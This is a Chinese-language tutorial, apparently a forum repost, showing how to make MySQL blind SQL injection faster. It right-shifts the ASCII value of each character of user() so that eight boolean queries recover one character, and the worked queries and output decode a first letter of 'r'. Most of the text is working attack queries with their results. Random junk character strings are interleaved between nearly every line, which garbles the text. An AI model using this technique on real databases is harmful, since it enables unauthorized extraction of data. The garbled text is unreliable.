关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位
2 D8 U3 l) V( p8 W: m, o

' M4 m/ P. ^+ N9 }
下面将以查询mysql数据库当中user()的第一位为例:
8 b5 I4 A1 C. I3 [( p8 c5 M
3 N) d2 `# _" J
, z7 M! R0 v$ X7 b
ps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)
% w6 O) r" J8 B. L8 _' x, a; [

- D  U' E- X0 Y& p& l
: U. [; A+ o# N首先执行如下sql语句:

+ D/ d- B6 q2 `/ `
$ T: K1 A) e2 b
mysql> select (ascii((substr(user(),1,1))) >> 7)=0;
8 D# }$ l1 s3 u& e+ b5 m# D
0 _, Q( ?$ p0 Y

我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的
1 K( p2 A) P/ t; @2 V7 o  l
) M* }% l% f3 o, Z5 b& w9 p
0 k2 j3 t; x. j; R( d* S
: M' h$ N7 I& Z第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1


: O# ]1 u2 i4 e$ `# i
如果运算结果为1,说明第一位为0,不为1
5 T5 c. J1 {+ y

6 ~7 t  U* K* F6 |( T  p& W, p4 P
+————————————–+

| (ascii((substr(user(),1,1))) >> 7)=0 |
4 C) C# N: z& L! j; a* c
1 f  t, i( `, F& d3 J7 G2 ?; E+————————————–+

7 Z6 V( ]: ~6 L| 1 |

) r  k2 B: _. |& ?7 o2 [0 r4 `+————————————–+
1 x- N+ i& Q. {& z
) `% q# S" |8 d9 |- b1 row in set (0.00 sec)

% O9 P2 j6 M  Q) f; c6 k2 {8 q这样我们就确定这个8bit的ascii的第一位为0


) z. V; S. q- K
第二次我们来做6次右偏移来确定前两位
9 K, P8 h6 h, j( \4 a
0 D1 w5 v) }# W$ Q( r. D0 X
* q. P  s2 ^# s- f9 d6 ~
前两位可能是01或00,即依然可以与0做比较,
; M" t  W# A6 _0 S! J; G3 o# \0 J
mysql> select (ascii((substr(user(),1,1))) >> 6)=0;

+————————————–+

| (ascii((substr(user(),1,1))) >> 6)=0 |
/ P9 A; {1 I9 B( o4 f) R8 d! l. k
+————————————–+

| 0 |
+ _' }- P7 @( i; |
8 M+ A2 ]7 U0 K; |1 U* s4 Y+————————————–+
, T' P+ a' ?+ _1 ~7 v" r$ w
1 row in set (0.00 sec)
  d5 t0 A5 F4 S' y& ^1 n! m  {1 N
: w- k$ T4 m7 ]; O# f' N# r7 }& c
! ]% h2 Z5 F2 q( h! ?6 x& N
结果为0,即第二位为1


: e$ G' p  T: d# q
1 s3 M3 M* G/ r$ J0 q0 P! `" d/ I/ G开始猜测前三位为010或011

+ |  Z3 A4 j: T# |$ D7 m5 ^) a
% H0 Z7 _2 C2 L7 @3 E% e+ L
$ E' M& p4 d* {让我们看看010和011的ascii码是多少
5 ]5 ~; L! r4 h  j3 ^5 @

) {4 ^+ R, `) I$ A7 z: s; f
- x$ P7 r3 E& B) x" f分别查询select b’011′ select b’010′
& b8 i3 ]4 E& P: @% v$ t: O9 K


获得结果 010 = 2 011 = 3



执行如下sql:



mysql> select (ascii((substr(user(),1,1))) >> 5)=2;

+————————————–+
- J/ a4 I8 c: B' [  [1 l+ n! p; v
# m3 d" m5 G! `, |6 N: F| (ascii((substr(user(),1,1))) >> 5)=2 |
4 I' E! I- N8 i' [; X. ]" X1 O
+————————————–+
( s3 r$ {' F( C
. R8 y2 Z+ @) m3 Z3 m  K' I| 0 |

+————————————–+
5 {% A8 `2 S% U1 i2 x1 `6 f- e' B
0 U" B2 s- e, R! Y( g7 e0 Q, a% }即前三位不为010,而是011


8 H+ {1 K( z9 o" t0 T
2 X! J2 F$ ?, K直到获得最后一位



最终结果为:01110010
( E/ B! U5 h) O5 [5 L

: v3 O) I  x/ R- k1 T' B% _9 B
转换一下:



. e6 y$ O, q  L& B! ~+ V& F4 \: O! ]select b’01110010′
3 y. e; C5 p9 f" l& b  |* v$ p

; c) ]: |$ v+ y
" C3 f6 e$ A7 @1 r查询结果

: N. P* z+ c) `) t0 a
4 H/ y& r9 n4 M2 G, h
& z' ]* `3 S5 q+————-+
: [! u3 U5 a3 m$ U1 G8 B7 X1 r
& g- K( u/ C, S+ A* s; D5 ~| b’01110010′ |
6 k0 I8 ~( j. C  b
+————-+

| r |
7 g# |) p. R. t3 n9 v# J
+————-+
9 ^: ]& c! ^* }! k% e
1 row in set (0.00 sec)
8 `/ {/ M  |- l, }/ f+ Q+ R
& a% J- X/ c1 ]' R/ N: m4 L
; g7 a2 F2 I" Z% U3 x4 T
# b5 \9 U: j6 O- G' D4 |这样我们就获得了user()的第一位.其它位依此类推